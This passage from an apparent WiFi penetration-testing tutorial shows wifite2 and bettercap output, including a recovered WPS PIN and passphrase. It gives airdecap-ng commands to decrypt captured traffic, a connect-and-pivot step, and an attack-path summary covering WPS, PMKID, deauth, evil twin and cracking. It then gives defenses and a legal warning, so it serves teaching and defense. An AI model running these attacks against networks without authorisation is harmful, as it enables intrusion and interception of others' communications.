   NUM  ESSID            CH  ENC    PWR   WPS?  CLIENT
   ---  -----            --  ---    ---   ----  ------
     1  HomeNetwork       6  WPA2   -42   Yes   1
     2  CafeWiFi          1  WPA2   -58   Yes   0
     3  LegacyPrinter     3  WEP    -72   No    1
     4  Neighbor_5G        6  WPA2   -55   No    2

 [+] select target(s) (1-4) separated by commas, or 'all': 1

 [+] (1/1) starting attack on "HomeNetwork" (AA:BB:CC:DD:EE:01)
 [+] trying PMKID attack...
 [+] captured PMKID hash
 [+] trying WPS Pixie-Dust attack...
 [+] WPS Pixie-Dust attack successful!
 [+] PIN: 23456789
 [+] PSK: sunshine2024

wifite2 tries attacks in order of speed: PMKID first, then Pixie Dust, then WPS brute-force, then handshake capture + dictionary. It’s the script kiddie tool, but it’s also genuinely useful for quickly testing multiple networks during an engagement.

bettercap

sudo bettercap -iface wlan0mon -eval "wifi.recon on"
192.168.1.0/24 > wlan0mon » wifi.recon on
[14:58:01] [sys.log] [inf] wifi scanning started on wlan0mon

wifi.ap AA:BB:CC:DD:EE:01 HomeNetwork -42 dBm ch:6 WPA2
wifi.ap AA:BB:CC:DD:EE:02 CafeWiFi -58 dBm ch:1 WPA2
wifi.client 11:22:33:44:55:01 -> HomeNetwork

bettercap is more flexible than wifite2. It’s interactive, scriptable, and handles both wireless and wired attacks. The wifi module can deauth, capture handshakes, and run KARMA attacks all from one interface.

Post-compromise: what to do with the WiFi password

Once you have the PSK, the engagement isn’t over. Here’s what most people forget to do.

Decrypt captured traffic

If you captured traffic during the engagement (even encrypted), you can now decrypt it offline using the recovered PSK.

# Decrypt with airdecap-ng
airdecap-ng -e "HomeNetwork" -p "sunshine2024" wpa_capture-01.cap
Total number of stations seen            4
Total number of packets read         18241
Number of WPA handshakes                 1
Number of plaintext packets              0
Number of decrypted WPA packets      15827
Number of corrupted WPA packets          3
Number of skipped packets             2410

The output file wpa_capture-01-dec.cap contains the decrypted traffic. Open it in Wireshark and you can see HTTP requests, DNS queries, plaintext protocols, and anything that wasn’t additionally encrypted with TLS.

Connect and pivot

# Re-enable NetworkManager
sudo systemctl start NetworkManager

# Connect to the network
nmcli dev wifi connect "HomeNetwork" password "sunshine2024"

Now you’re on the internal network. ARP scan, port scan, service enumeration, lateral movement. The WiFi password was just the door.

Detection and defense

For network administrators

Wireless IDS/IPS: Deploy Kismet or a commercial WIDS to detect rogue APs, deauth floods, and evil twins. Kismet detects anomalies like multiple APs with the same SSID on different channels or BSSIDs.

# Kismet for passive monitoring
kismet -c wlan0mon

802.11w (PMF): Enable Management Frame Protection. This encrypts deauth and disassociation frames, making deauth attacks impossible. On WPA2, it’s optional. On WPA3, it’s mandatory.

Disable WPS: There is no reason to have WPS enabled on any network in 2026. Disable it in the router admin panel and verify with wash that it’s actually off (some routers advertise WPS even when “disabled” in the UI).

WPA3-only mode: If all your clients support it, disable WPA2 transition mode. This eliminates the downgrade attack path.

802.1X with certificate pinning: For enterprise networks, deploy EAP-TLS (certificate-based authentication) instead of PEAP/MSCHAPv2. If EAP-TLS isn’t feasible, at least pin the RADIUS certificate via GPO on Windows and MDM on mobile devices.

Network segmentation: Even if someone cracks the WiFi, they should land in a restricted VLAN with no access to critical infrastructure. WiFi should be treated as an untrusted network.

Strong PSK: If you’re using WPA2-PSK, use a truly random passphrase of 20+ characters. WPA2 supports up to 63 characters. A random 20-character passphrase is not crackable with current GPU technology.

# Generate a strong PSK
openssl rand -base64 24
K7mR2pLx9Nf4QhW3vY6j8bTc

For users

  1. Disable auto-connect to open networks
  2. Forget networks you no longer use (reduces probe request leakage)
  3. Use a VPN on public WiFi (the captive portal attack still gives the attacker your WiFi password, but at least your traffic is encrypted)
  4. Check for PMF support: on your router admin page, look for “Protected Management Frames” or “802.11w” and enable it
  5. Disable WPS. Find the setting and turn it off. Then verify it’s actually off

Conclusion

WiFi security has improved dramatically from WEP to WPA3. But the attack surface hasn’t shrunk. It shifted. WEP was a protocol failure. WPA2 is a password strength problem. WPA3 is a transition mode problem. And the protocol-agnostic attacks (deauth, evil twin, KARMA) work against all of them because 802.11 management frames remain unprotected on most networks.

The realistic attack path in 2026 is: check WPS first (Pixie Dust takes seconds), try PMKID (no interaction needed), capture a handshake if needed (deauth one client), crack offline with hashcat and rules. If all that fails, evil twin with captive portal. If the network is WPA2-Enterprise, evil twin with hostapd-wpe and crack MSCHAPv2.

WPA3-only with PMF enabled and no WPS is currently the strongest configuration available for consumer networks. For enterprise, EAP-TLS with certificate pinning and a WIDS. Everything else is buying time.

Be careful. Intercepting or disrupting wireless communications that you don’t own or have explicit authorization to test is illegal in most jurisdictions. In the US, it falls under the Computer Fraud and Abuse Act (18 U.S.C. 1030) and the Wiretap Act (18 U.S.C. 2511). In the EU, the Directive on Attacks against Information Systems (2013/40/EU) applies. Deauthentication attacks are explicitly illegal even if you don’t capture any data, because they constitute intentional disruption of a communication service. Everything described in this article should only be performed on networks you own or have explicit written authorization to test.